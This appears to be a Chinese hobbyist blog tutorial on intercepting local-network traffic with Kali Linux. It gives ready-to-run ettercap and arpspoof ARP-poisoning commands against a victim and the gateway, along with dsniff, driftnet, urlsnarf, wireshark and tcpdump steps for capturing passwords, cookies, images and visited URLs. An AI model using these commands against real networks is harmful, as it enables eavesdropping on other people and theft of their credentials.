kalilinux内网嗅探,局域网监控记录

时间:2022-11-03 17:56:53

快过年了没事瞎玩玩,2017有空玩玩kali。前提需要链接到无线网

一、Ettercap(Etter [人名] 埃特cap[kæp] 盖;帽子)是一款嗅探工具,包含ARP欺骗,DNS,劫持,中间人攻击,嗅探密码等功能

(ettercap经常报错ERROR 12 Cannot allocate memory,不知道怎么解决哪位大神指教一下,求教)

开启转发,重新开启一个命令行:
echo "1">/proc/sys/net/ipv4/ip_forward

进入Kali Linux启动Sniffing/Spoofing>Network Sniffers>Ettercap 或者命令行  ettercap -G  启动图形界面
ARP(Address Resolution Protocol)即地址解析协议是根据IP地址获取物理地址的一个TCP/IP协议。
1、切换到Sniff标签,点击Unified sniffing…,选择wlan0网络接口,(wlan0 是无线接口eth0 是有线接口)
2、Host标签,点击Scan for hosts,很快,Ettercap就列出了所有该网络下的C类地址,点击192.168.1.102(被攻击者IP)添加到Target 1,点击192.168.1.1(网关地址)添加到Target 2
3、设置中间人,Mitm->arp poisoning...->Sniff remote connections打对勾 点击确定
4、Start->Start sniffing 开始监听
5、点view -- connections开始查看连接:

命令行方式

ettercap -T -q -i wlan0 -M arp:remote /192.168.1.102/192.168.1.1/
ettercap使用方法,参数详解:
-P  使用插件
-T  使用基于文本界面
-q  启动安静模式(不回显)
-M  启动ARP欺骗攻击
192.168.1.102/ 被攻击的目标主机,第二个192.168.1.1网关ip

ettercap -i wlan0 -Tq -M arp:remote /192.168.1.100-253/ /192.168.1.1/
第一个/ / 中内容为所欺骗的目标,第二个为网关。 可写//  //   里面为空,表示全部欺骗。

二、arpspoof 进行arp欺骗

必须另外开启终端 echo  1>/proc/sys/net/ipv4/ip_forward 进行IP流量转发,不然被攻击者无法上网

命令:arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102 

嗅探密码:dsniff -i wlan0

三、driftnet (drift 英 [drɪft] n.漂移,偏移;趋势) 是一款简单的图片捕获工具;urlsnarf捕获url链接 

再打开一个终端,输入driftnet -i wlan0  弹出一个小方框等待获取图片

语法 : driftnet   [options]   [filter code]主要参数:

-b 捕获到新的图片时发出嘟嘟声
-i  interface     选择监听接口
-f  file   读取一个指定pcap数据包中的图片
-p  不让所监听的接口使用混杂模式
-a  后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)
-m number 指定保存图片数的数目
-d directory  指定保存图片的路径
-x prefix  指定保存图片的前缀名
使用举例:读取一个指定pcap数据包中的图片 driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/
再打开一个终端,输入 urlsnarf -i wlan0 监听浏览过的网页日志,等待获取

五、 数据包捕获工具

1、wireshark:命令行wireshark启动,中间的Capture 选择 wlan0 然后点击 Start,获取cookie以及没有加密的明文密码
2、tcpdump:可以将网络中传送的数据包完全截获下来提供分析。支持针对网络层、协议、主机、网络或端口的过滤

命令行 tcpdump -i wlan0